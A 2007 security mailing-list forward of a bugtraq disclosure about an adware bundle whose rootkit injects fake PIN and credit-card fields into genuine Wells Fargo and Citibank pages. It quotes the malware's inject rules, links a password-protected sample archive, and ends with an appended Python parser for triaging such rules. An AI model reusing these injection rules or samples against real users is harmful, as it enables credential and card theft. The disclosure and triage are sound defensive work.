[funsec] [Fwd: Iframe-Cash/Iframe-Dollars Adware bundle...oooh... my ....god..]
rms at computerbytesman.com
Tue Mar 13 11:58:46 CDT 2007
Perhaps Web browsers shouldn't allow external DOM access to https Web
pages....
Richard
---------------------------- Original Message ----------------------------
Subject: Iframe-Cash/Iframe-Dollars Adware bundle...oooh... my ....god..
From: "Thierry Zoller" <Thierry at Zoller.lu>
Date: Sun, March 11, 2007 1:30 pm
To: bugtraq at securityfocus.com
--------------------------------------------------------------------------
Dear list,
Whoever deals with these people and thinks they are a benign Adware
company (and thus spreads their bundles).
Check this :
Ignoring the fact that they basically install a Rootkit, I attached a
few files I reversed, they install a DLL that does not directly KEYLOG your
banking data, but INJECTS HTML CODE into the _genuine_ (SSLed) Banking page
asking you to enter more details (like PIN, Magic Password etc), then
capture that data and transmit it (I did no further investigation)
http://secdev.zoller.lu/system32.zip
Pass: 123
I am disgusted. They even created their own XML parser for this ...
An extract of HTML code they inject :
-------------------------------------
<inject
url="wellsfargo"
before="name=userid autocomplete='off'></DIV>"
what="
<DIV><LABEL for=userid>ATM PIN</LABEL>:<BR><SPAN class='mozcloak'><INPUT
id=pin tabIndex=2 maxLength=4 type=password size=4 name=pin
autocomplete='off'></SPAN></DIV>
"
block="alt=Go"
check="pin"
quan="4"
content="d"
>
</inject>
------------------------------------
Attached the main files (pass 123), feel free to add this as HIPS or whatever
signatures, those interested in a complete reversal can contact me
to receive the EXE in question.
I have no more time feel free to dig deeper.
I especially liked this :
------------------------
<inject
url="citibank.com"
<TR><TD colspan=3 class=smallArial noWrap><SPAN STYLE='color:red'>To
prevent fraud enter your credit card information please:</SPAN></TD></TR>
Puke..
--
http://secdev.zoller.lu
Thierry Zoller
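Added example for triage, not code from the post or from the attached sample: a tolerant parser for the `<inject>` rule format quoted above, which lists the targeted site, the input names the payload adds to the genuine form, and the field whose value is harvested. The meanings of `check` (captured field) and `quan` (expected length) are assumptions inferred from the extract.

```python
import re
from dataclasses import dataclass

# Constructed sample: the wellsfargo rule quoted in the post, reassembled as one string.
SAMPLE_CONFIG = '''<inject
url="wellsfargo"
before="name=userid autocomplete='off'></DIV>"
what="
<DIV><LABEL for=userid>ATM PIN</LABEL>:<BR><SPAN class='mozcloak'><INPUT
id=pin tabIndex=2 maxLength=4 type=password size=4 name=pin
autocomplete='off'></SPAN></DIV>
"
block="alt=Go"
check="pin"
quan="4"
content="d"
>
</inject>'''

# The config is not well-formed XML (raw '<' inside attribute values), so a standard
# XML parser rejects it; these regexes rely only on the pattern visible in the extract:
# attributes are double-quoted, the HTML inside them uses single quotes or none.
INJECT_RE = re.compile(r'<inject\b(.*?)>\s*</inject>', re.S)
ATTR_RE = re.compile(r'(\w+)="([^"]*)"', re.S)
INPUT_NAME_RE = re.compile(r'<INPUT\b[^>]*?\bname=([\'"]?)([\w-]+)\1', re.I | re.S)

@dataclass
class InjectRule:
    url: str      # substring matched against the visited URL
    before: str   # anchor HTML the payload is inserted ahead of
    fields: list  # input names the payload adds to the genuine form
    check: str    # assumed: injected field whose value gets captured
    quan: str     # assumed: expected length of that value

def parse_inject_rules(text):
    """Extract every <inject> rule from a config blob in the format quoted above."""
    rules = []
    for m in INJECT_RE.finditer(text):
        attrs = dict(ATTR_RE.findall(m.group(1)))
        fields = [name for _, name in INPUT_NAME_RE.findall(attrs.get("what", ""))]
        rules.append(InjectRule(url=attrs.get("url", ""), before=attrs.get("before", "").strip(),
                                fields=fields, check=attrs.get("check", ""), quan=attrs.get("quan", "")))
    return rules

def summarize(rules):
    """One triage line per rule: which site, which fake fields, which value is harvested."""
    return [f"{r.url}: adds {r.fields} before '{r.before}', captures '{r.check}' ({r.quan} chars)"
            for r in rules]

if __name__ == "__main__":
    for line in summarize(parse_inject_rules(SAMPLE_CONFIG)):
        print(line)
```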